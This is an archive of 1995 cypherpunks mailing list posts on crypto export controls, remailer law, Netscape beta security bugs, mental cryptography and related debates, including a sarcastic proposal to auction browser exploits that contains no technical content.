to note that they are not "dreaded."

No doubt Carol meant this tongue-in-cheek, but I think it important to
remind folks that things are not so black and white as to allow
demonization of such companies, at least not based on what has come out so
far.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Fri, 13 Oct 95 15:40:31 PDT
To: Brad Shantz <bshantz@nwlink.com>
Subject: Re: Exporting Mental States
In-Reply-To: <9510132031.AA10823@toad.com>
Message-ID: <Pine.3.89.9510131709.B15249-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 13 Oct 1995, Brad Shantz wrote:

> I just arrived in Ottawa, Canada from Seattle, USA.  I had sort of 
Wellcome to Ottawa.

> Anyway, i got to customs in Ottawa, and they asked me if I had 
> anything to declare.  I immediately thought, "Should I tell them 
> about the notebook?"  I decided against it.  How does export of 
> intellectual property work?

Don't worry about it, Canada's not even a foreign country according to ITAR.
If you have pgp on that machine, you haven't exported it, but it's still 
covered by export controls.

We pretty much have exactly the same export restrictions on US origin 
software, but if it comes from anywhere else (including Canada of course)
it can be exported without a permit to all but four countries (iran, cuba
and two others) and cannot be exported at all to UN embargoed countries
(bosnia, iraq, angola...). Since none of these have good net access, it's 
not much of a prob. The issue of whether ftp is an export hadn't resolved 
when I asked, and there might be a headache regarding US intellectual property 
and that US origin problem. 

So basically you can't export pgp, nautilus, rsaref..., but if they were 
rewritten from the ground up in Canada and put on the net, you *might* be 
ok. (that ignores the last issue, so ask Foreign Affairs and maybe a lawyer 
first, though I really can't see how a public domain idea can have a 
nationality)

ElGamal and IDEA would be completely without problems as they are not 
even American intellectual property.

Of course, I'm not a lawyer, and the gov has no obligation to agree with 
the advice of its own employees.

If you're interested I could mail you the address and phone no. of the export
controls division of external affairs. The policy officer was rather 
helpful. They also have a big booklet on export controls.

If you plan on going over, might as well ask about the American 
citizenship problem that's come up in the Anguila thread. Sounds very funny.
(of course that would say nothing about the US State Dept's opinion on it)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Edwards <tedwards@access.digex.net>
Date: Fri, 13 Oct 95 15:42:48 PDT
To: cypherpunks@toad.com
Subject: Yes, indeed the PA law is for real!
Message-ID: <Pine.SUN.3.91.951013183116.11492A@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



Well folks, you can go view the new PA law yourselves at URL
http://moose.erie.net/~italo/rssb655.html

PA Senate Bill 655 was signed into law on June 13, 1995, and it does 
appear to make non-logged anonymous remailers illegal.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Fri, 13 Oct 95 18:06:32 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <199510131643.QAA05528@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>So no, this is not some great conspiracy on Sun's part to
>co-opt the list. You can return to your regularly scheduled
>paranoid fantasies. Thank you....

DAMN!.....I thought someone was on to something here.

I mean maybe we could get Microhard to do a meeting.
Or the dreaded RSA or somebody.

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMH75T4rpjEWs1wBlAQFM2QP9Eeh1wcbdUMRk+Z8MXX8rix2VeZt1rqnb
d735C9bt0B2x0FtYjOTi6r8FPUYWV6AVYjn2z/m+RjZ71H7MoOSoyHOk+XA+biGM
TAzSCPcJNvTTjAyAGs7/wC8WC0z6QudMXkitPuXW4s5ZeqX3yuEbPjlyBYwRbt3h
LNTVc/BfrsI=
=NgMw
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Thu, 12 Oct 95 18:40:15 PDT
To: Adam Shostack <adam@homeport.org>
Subject: Re: IDEA algorithm
Message-ID: <v02120d07aca4c6d130f2@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:38 PM 10/12/95, Adam Shostack wrote:
>| This may be an odd question, but who is it that owns the IDEA algorithm?
>|
>| We've had a number of requests regarding licensing RSAREF tying into
>| legitmizing PGP products. Part of that includes IDEA obviously.
>
>        Dr Peter Profos
>        Ascom-Tech AG, Solothurn Lab
>        Postfach 151
>        4502 Solothurn, Switzerland
>        v. +41 65 242 885
>        fax _41 65 235 761
>
>        Now go buy a copy of Applied Cryptography, which answers this
>and other questions you might have. :)

I know.. I blush. I've become such a netjunkie that not being able to find
any of the answers on web pages, or Cypherpunk logs I just panicked.

Thank you everyone who sent me a message with the reference.

I'd say more, but I have to run and get my fix in.

(Btw... what would be the absolute coolest thing folk would like to see
added to RSAREF? That is, other than code that we will need to negotiate
for. What new thing, speed upgrade, enhancement, etc would just tickle?)

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 13 Oct 95 15:55:14 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape 2.0b1J still core dumps on Java
In-Reply-To: <307EB010.42C1@netscape.com>
Message-ID: <Pine.SUN.3.91.951013184249.18307C-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Jeff Weinstein wrote:

>   I'm not sure what you are getting at.  Are you saying that you've
> tried running Netscape's Java on SunOS and it doesn't work?  If that
> is the case, then it is a bug that will be fixed...

Uh, I must have been asleep and read your comment as Netscape 2.0 Java 
did not run on SunOs...Perhaps you can understand my confusion when it 
says at http://home.netscape.com/comprod/mirror/unix/ :
"The IRIX and Sun Solaris versions of Netscape Navigator 2.0b1 include 
Java support."  With no mention of SunOs.  But looking at the ftp sites, 
I do see the 20b1J for SunOs4.1.3.  Yey! 

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Fri, 13 Oct 95 16:31:28 PDT
To: "L.Detweiler" <ldetweil@csn.net>
Subject: Re: CYPHERPUNKS EXPOSED
In-Reply-To: <199510131905.NAA00772@teal.csn.net>
Message-ID: <Pine.SUN.3.91.951013193016.761A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, L.Detweiler wrote:

> 
> Attn Reporters and Writers!! 
> 
> who are the CYPHERPUNKS?
> what are they talking about?
> what have they done in the past?
> who are the "leaders"?
> what do they believe in? 
> what are their *real* goals?
> 
> My name is L.Detweiler, and I've made a serious study of the more ulterior 
> aspects of the CYPHERPUNKS for several years, and I invite you to peruse my
> findings at the web site below.
> 
> I've been quoted in various articles and I'm available for serious interviews
> with anyone who wants the REAL STORY BEHIND THE CYPHERPUNKS.
> 
> note: be forewarned that key cypherpunks consider me a heretical 
> blasphemer because of the tenacious, unforgiving honesty and 
> zealous antisychophancy by which I have pursued this herculean study.
> 
> 
> |   /\  |\| /~ L~            ``I have to spew this stuff, or I'd be on the
> L_ /~~\ | | \_ L_             roof with a high power weapon.'' -Jim Carrey


Settlement Agreement.


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Fri, 13 Oct 95 18:20:53 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <199510140119.VAA08113@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510120147.LAA13833@sweeney.cs.monash.edu.au>,
Jiri Baum <jirib@sweeney.cs.monash.edu.au> wrote:
> What you are missing is that you should not say
>   "I want to send my credit card number to Egghead Software"
> you should say
>   "I want to send my credit card number to 12 34 56 78 9A BC DE F0"

Why does this sound so much like defining the problem away?

Maybe I just don't get it...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMH8QCSoZzwIn1bdtAQFm1QGApigaZIVNZTghR9YrzwL/1dMCdu5zGMK5
QPCEJPY2W1hTrL/znVMkcOCg/Tw5ampO
=+2Co
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 13 Oct 95 18:22:04 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>
Message-ID: <Pine.OSF.3.91.951013211406.21015A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


As a Canadian, I am often astounded by the attempts of the United States 
government to apply American law extraterritorially. A case in point is 
the trade embargo with Cuba. Canada does not recognize this embargo and 
trades freely with Cuba. Several American corporations faced legal 
sanction in the U.S. for the actions of their Canadian subsiduries. I 
don't remember the details but can get references if anyone requires it.
ITAR regulations may be enforced by the U.S. government on the parent 
corporations if history is any judge.
In any case, these regulations are impeding standards development and the 
use of secure cryptography for commerce on the internet. As for key 
escrow and and other schemes to dilute security, no foreign company is 
going to use such 'bastardized' products, knowing that the U.S. 
government may be listening in. Especially since your president is 
talking about commercial spying.
Regards, 

Tim Philp
Brantford, Ontario
Canada

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================



On Fri, 13 Oct 1995 s1018954@aix2.uottawa.ca wrote:

> 
> 
> On Fri, 13 Oct 1995, Michael Froomkin wrote:
> 
> > > If while you are outside the USA you want to write some software that uses
> > > encryption and sell it worldwide, let me know.  I could put you up while
> > > you wrote it and my company could sell it for share of the selling price. 
> > > Let me know what you are thinking of and how long you think it would take. 
> > 
> > Of course if you are a US person (citizen or green card holder) this is 
> > just as much a violation of the ITAR than if you did it from inside the US...
> 
> Really? I thought except for incomes taxes, US laws only apply in American
> territory as opposed to applying to American people wherever they are (as 
> I heard Germany's does).
> 
> What if you were a dual citizen (US/Canada in my case)?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@lagos.CS.Berkeley.EDU (David A Wagner)
Date: Fri, 13 Oct 95 18:28:30 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape beta 2.0 [NOISE]
Message-ID: <199510140126.VAA08147@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510130224.TAA04729@infinity.c2.org>,
sameer <sameer@c2.org> wrote:
> 	Hey those shirts aren't measly!

Very comfy, in my opinion :-)
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMH8RzCoZzwIn1bdtAQGRTwGAzGuG7xyQyNmF7MZZpdU+1Wtx7tjmC1an
rnhYqyrNV/9XS3qLe789f8epr1/OsUE8
=cnDM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 13 Oct 95 21:28:35 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
In-Reply-To: <199510132226.PAA13627@jobe.shell.portal.com>
Message-ID: <199510140427.VAA15400@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


The Mad Scientist in the Middle writes via anonymous-remailer@shell.portal.com:

>The answer is doing cryptography in your head.  Well not quite, since many 
>cryptographic operations are very computing intensive, and not everyone can do 
>1000 bit mental modular exponention in a reasonable amount of time.  But if 
>you have a piece of secure hardware that you can trust to do some of these 
>operations for you, then all you need is a secure communications channel to 
>this piece of hardware.  

>There may be other ways, but I suggest that you establish a common key with 
>your crypto server ahead of time, and then simply encrypt all your 
>communications using a symmetric algorithm.  RC4 may be a reasonable choice, 
>since the operations are simple and easy to remember, but you need to keep 
>track of a 255-byte state.  WAKE is probably better.  Although it uses a large 
>key table, you only have to memorize it once, after which the only state that 
>is changing is four 32-bit registers.

I am not familiar with WAKE but I doubt that you could literally hold 128
bits in your head and manipulate them.

This is a problem which I have wondered about for some time.  Presumably
if we went to a digital cash world we would use smart cards to buy
things, but how do we make sure that nobody steals and uses our smart
cards?  Just typing in a PIN doesn't seem very safe to me, especially if
the card doesn't have a keypad built in and you're using a keypad in the
card reader as is often the case today.  Even with a pad on the card you
have to worry about eavesdroppers.

Biometric ID's (fingerprints, and Senator Feinstein's retina scans that
she wants to put on our national ID cards) have been proposed to solve
this but they are expensive and unreliable right now.  An information
based solution would be best if it were possible.

I have read one paper which attempts to solve this problem, called "Human
Identification through Insecure Channel".  Unfortunately my papers are in
a mess right now so I don't have the reference handy.  It was by some
Japnese researchers, published in one of the proceedings books.  I
believe a follow-on paper was published within the last year or two which
had some improvements or corrections to their algorithm.  Sorry to be so
vague, I'll try to dig out more info over the weekend.

Basically they used a challenge-response system which was intended to
be simple enough that people could do it in their heads.  The card
would display a random challenge string, some characters of which were
special to the user and others which he would ignore.  He would then
input a response string, where it didn't matter what corresponded to
the "ignore" slots, but in the special slots he had to produce certain
symbols corresponding to the other symbols, with the rules changing as
you move along.  The intention was that even by capturing and analyzing a
great many challenge-response pairs you couldn't create a response to a
challenge you hadn't seen before.

I coded this up, and frankly, I couldn't do the required manipulations in
my head, at least not without taking a very, very long time, and thinking
very carefully.  Maybe it would get easier with practice, I don't know.
But my overall feeling was that this would be at the limits of human
capability even for fairly bright people.  (OTOH I suppose learning to
read and write might seem pretty tough if you'd never done it.  Maybe
the 1st grade classes of the future will spend months training the kids
on how to use these kinds of algorithms.)

>I am sure better algorithms can be found for this purpose if mental 
>cryptography is made explicit as a design goal.  Perhaps it should be?

It's a hard problem to solve in general because you have only a human
mind to do the identification algorithm but you have computers to try to
break it.  But I would like to see the problem get more attention.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Fri, 13 Oct 95 19:40:12 PDT
To: cypherpunks@toad.com
Subject: Re: responce to graphic encryption replies
Message-ID: <9510140243.AA06608@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


> ... The graphic file is going to have a highly correlated 
> structure, long runs of white space etc. 

This is not the case for digital imagery. For any given band, if you
sample a significant portion of the image it would not be surprising to
see a more or less random distribution over the range.

> The statistics for such a file 
> would be different than the random distribution you'd get from using the 
> wrong key. 

If you decrypt with the wrong key, do you get a random distribution?
Would this be the case for all wrong keys? Would the statistics change
in any discernible pattern as the keys got "closer"?

> Even if the graphics format is compressed, leading to a more 
> even distribution, ...

This may give a better result. Most compressions involve a shift to the
frequency domain with a quantization of the samples. You might be able
to write a detector based on this discontinuity.

You could also try throwing an edge detector or some other morphological
recognizer at the output. It would still be cheaper than having to a man
in the loop, but you're going to spend a lot of cpu time.

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 13 Oct 95 23:16:23 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
In-Reply-To: <m0t3pvO-000K7RC@mail.infinet.com>
Message-ID: <307F54CF.573F@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


zoetrope@infinet.com wrote:
>         Why would a compony like Netscape jeapordise themselves by even
> letting                                               out a beta version so
> hackers have time to find bugs before the full version is released. Don't
> take me wrong I have only been on the net fer a little over a year and Love
> Netscape.  And If I knew what I was Doing I would love to help them.....

  The reason we do it is that without wide exposure outside the
company, it is virtually impossible to get complete testing coverage.
Given the incredible variety of machines, OS's, peripherals, etc.
that are available in the real world, there is no way we could
re-create every possible configuration in the lab.

  We also can't visit every web page, or think of every combination
of features that clever people in the real world come up with every
day.  

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 13 Oct 95 06:59:45 PDT
To: nobody@REPLAY.COM (Anonymous)
Subject: Re: Insecurity Section of the Internet Handbook
In-Reply-To: <199510131209.NAA20556@utopia.hacktic.nl>
Message-ID: <199510131217.AA35639@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>URL: http://mls.saic.com/programs.html
>   
>                   SECURITY PROGRAMS

#define paranoia on

I wonder if some alert type has downloaded these and MD5 checked the tar.gz
files against known clean ones. Having SAIC hand you your security tools is
like having a NSA agent handing you a floppy with your brand new encryption
programs.

#define paranoia off

Mark
mark@lochard.com.au
The above opinions are rumoured to be my own.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 13 Oct 95 20:58:57 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.951013234946.9707B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 13 Oct 1995 s1018954@aix2.uottawa.ca wrote:

> Really? I thought except for incomes taxes, US laws only apply in American
> territory as opposed to applying to American people wherever they are (as 
> I heard Germany's does).

The US has frequently tried to reach citizens anywhere in the world.  
Thus when private ownership of gold was banned in the US in the '30s, the 
regs outlawed possession of gold by Americans anywhere on earth.

Likewise, when the Feds proposed federal licensing of space launch 
vehicles a few years ago, they proposed outlawing unlicensed space 
launches by Americans anywhere on earth.

Obviously, nuclear technology was controlled so that it was illegal for 
Americans who had nuclear skills to work in nuclear power plants in 
certain countries.

Such laws and regulations usually apply to US citizens (whether resident 
or not) and non-citizens who are US residents.

> What if you were a dual citizen (US/Canada in my case)?

Dual citizens are bound by the laws of both countries.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 14 Oct 95 00:04:37 PDT
To: cypherpunks@toad.com
Subject: Re: Same ol' massive MITM exposure in Netscape 2.01b
In-Reply-To: <Pine.SOL.3.91.951013122654.26464D-100000@chivalry>
Message-ID: <307F601F.19A2@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero wrote:
> 1) The client does not do any verification that the certificate used for
> the transaction is one associated with the server, allowing MITM
> substitutions as long as the server has a properly signed certificate
> 
> 2) The client does not issue warnings for redirections from one https
> page to another https page, even if the url to which it is redirected has
> a different hostname to the url originally dereferenced.

  I'm working on these right now.  A future beta will have fixes for
this.

> 3) In the case of redirection, the document info screen does not provide
> information about the originaly referenced page, just the final page.
> This allows the MITM to intercept the first request, steal the request
> data, then issue a redirect to hide the certificate used in the intercept.

  If the previous two are fixed, it doesn't seem that this is really
important.

> 4) In the beta version, the document info page does not display the
> security info (I did check with  MITM disabled).

  Did you have the disk cache turned off?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 14 Oct 95 00:02:22 PDT
To: cypherpunks@toad.com
Subject: Re: Anguilla Cypherpunks Meeting
Message-ID: <v02120d15aca51d82e753@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



[various comments about extraterritorial reach]

Laws that affect the behavior of citizen-units, no matter where
they go, rest on the theory of "personal jurisdiction".

Note that in addition to ITAR, the various laws on money laundering,
as well as the RICO statues, apply to US citizens wherever they
may be. Ditto for tax laws -- one of the little gems that I
learned last week was that penalties to failure to report worldwide
income are going to be substantially increased. I guess they're
not getting very good compliance for some reason...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sat, 14 Oct 95 00:16:32 PDT
To: cypherpunks@toad.com
Subject: AP on trashing/computer fraud ring
Message-ID: <v02120d16aca5214fcc16@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Although I generally agree that capturing information online has
certain advantages to the criminal over going through the trash,
that certainly didn't stop this bunch.

Doug [wondering if this will affect the market for home shredders]

=======================

        ATLANTA (AP) -- Thirty people have been charged in a $10 million
fraud scheme that involved counterfeiting checks, bank statements
and credit card receipts pulled out of the trash.
        ``What we're finding is people are getting more and more clever
with what they pull out of the trash,'' U.S. Attorney Kent
Alexander said. ``This is the most clever scam I've ever seen.''
        The defendants, who defrauded people in 17 states, used checks,
bank statements, credit card receipts and other documents from
garbage bins to create counterfeit checks, false driver's licenses
and false credit reports, Alexander said.
        Investigators said software was used to rub out information on
the discarded paper. Counterfeit blank checks, printed on
high-quality color printers, were allegedly used to defraud banks
of $2 million.
        A core group of about eight people moved the operation to
Atlanta from New Jersey five years ago because they thought it
would be easy to take advantage of Southerners, the prosecutor
said.
        Of the 30 people charged, 24 have pleaded guilty, Alexander
said. Twelve of the 24 have been sentenced to jail terms of up to
eight years and restitution of up to $218,070.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Fri, 13 Oct 95 23:07:57 PDT
To: cypherpunks@toad.com
Subject: Re: applications
Message-ID: <v02130502aca4f00a52a5@[134.84.101.186]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 pm 10/13/95, cYberpUnc wrote:
>        I know this isnt what you guys generally talk about but I was curious.
>Off the top of your head do you know of any sites where I can get kracking
>apps for macs?  Any information would be greatly appreciated.

Before looking at the address information I was going to send a one line: "Go away" reply to the question. I thought you promised to try to be less obnoxious. If you'd calm down and read the list for a while you might realize why this might not be the place to pose such questions. Why not take a look at the newsgroup alt.2600? You might find it a rather rude place to frequent and I'd certainly never send my 13 year old there (my oldest is currently 8) but I get the impression the topics you'd find there might prove more interesting than the political and/or technical discussions you'll find here. By all means enjoy yourself here but spend more time listening.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@gofast.net
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sat, 14 Oct 95 00:11:18 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510132330.XAA18917@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


And some of us wish 2.0 would show images (the windoze 16 version)
And I'm not even clever, and have downloaded three copies.

>  We also can't visit every web page, or think of every combination
>of features that clever people in the real world come up with every
>day.  
>
>	--Jeff
>
>-- 
>Jeff Weinstein - Electronic Munitions Specialist
>Netscape Communication Corporation
>jsw@netscape.com - http://home.netscape.com/people/jsw
>Any opinions expressed above are mine.
>
>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Sat, 14 Oct 95 01:16:37 PDT
To: cypherpunks@toad.com
Subject: Guess what I found...
Message-ID: <199510140816.CAA07071@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: comp.os.ms-windows.win95.misc,alt.fan.bill-gates,alt.privacy
Subject: Re: Microsoft Network: Hard Drive Raid
Date: 11 Oct 1995 23:59:58 -0700
Message-ID: <45iede$dp2@Networking.Stanford.EDU>
References: <45h0v7$579@news.corpcomm.net>

rryan@blackhills.com (Richard Ryan) writes:
>Had my first hard core, proveable case of MSN reading someones drive. Store 
>Client had entered fantasy company name upon installing a program. Forgot about 
>it, didn't tell anyone. 2 days after downloading a simple text file from MSN a 
>junk mail offering from Pitney-Bowes showed up in his snail mailbox addressed 
>to him c/o the fantasy company. Somebody is playing somewhere they shouldn't 
>be. Any comments, Microsoft? 

I registered as Richard E. Graves (changing middle initials and adding an
unnecessary suite number to your address are good ways to track who has
been selling whom your address). Richard E. Graves also received mail from
Pitney-Bowes.

Microsoft says they don't sell their mailing lists. Clearly, someone has
taken advantage of security holes in the NT servers that make up MSN and
*stole* the mailing lists. Maybe unauthorized external access accounts for
the abysmal performance of MSN, in part.

-rich
 moderator of the win95netbugs list
 http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Sat, 14 Oct 95 04:18:49 PDT
To: cypherpunks@toad.com
Subject: airport security
Message-ID: <951014071611.44602170@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Roy M. Silvernail wriote:

>Have you flown recently?  They now ask you this scripted question about
>whether you have been approached by anyone you don't know since arriving
>at the airport, and warn you not to accept anything from a stranger or
>leave your carry-on baggage unattended until you board the plane.  The
>ticket agent told me it was a "new FAA regulation".  I hadn't flown
>anywhere for a few years.  Anyone know how long this has been happening?
>         Goodbye freedom, hello police state.
>I wonder how long before I need a passport to cross a state line...

  The US is merely trying to catch up to what the Europeans have been doing
for over a decade. In fact, the US still has a way to go. You ought to pass
through Heathrow in London some time to see what real airport security looks
like. The US security changes are a recent response, starting after the
World Trade Center bombing and being stepped up on a continuing basis.
Today you need a picture ID to board with your ticket. Tomorrow...? We have
lived in relative safety compared to the rest of the world, but I think those
days are over. 

Usual disclaimer.  Bob Bruen.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 14 Oct 95 04:56:18 PDT
To: cypherpunks@toad.com
Subject: Netscape rewards are an insult
Message-ID: <9510141153.AA16412@all.net>
MIME-Version: 1.0
Content-Type: text


	The idea that Netscape (like Microsoft) thinks they can get free
testing services from all over the net by real experts just by offerring
a tee shirt is down right offensive.

	I have a better idea.  How about an open market in break-in
software.  We crack Netscape and offer the crack code to the highest
bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
outbid the competition by a factor of 2 to get the details of the hole.
Here's how it works:

	- We get a panel of 5 cypherpunk judges who test each claimed hole.
	- Exploit code is sent to the panel for verification.
	- If they verify the hole, it is put up for bid.
	- Winning bidder gets the code for 3 months before it is released
	  on hacker BBS systems throughout the world.
	- The panel of judges splits 25% of the money paid for the code
	  as pay for their efforts.  The rest goes to the author.

	I have an even better idea.  How about if Netscape gets some
competent programmers with real security expertise, adds in some good
change controls, a serious internal testing program, quality control ala
ISO-9000, internal IT auditors, external IT auditors, training and
education for their employees, and everything else it takes to be in the
software business in a serious way.

	As an alternative, we could help them contact the shareholders
for a lawsuit.  After all, they are a public company now and are responsible
to the shareholders for the value of their stock.  If it goes down because
they aren't doing an adequate job of software quality control, the officers
may be personally liable.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
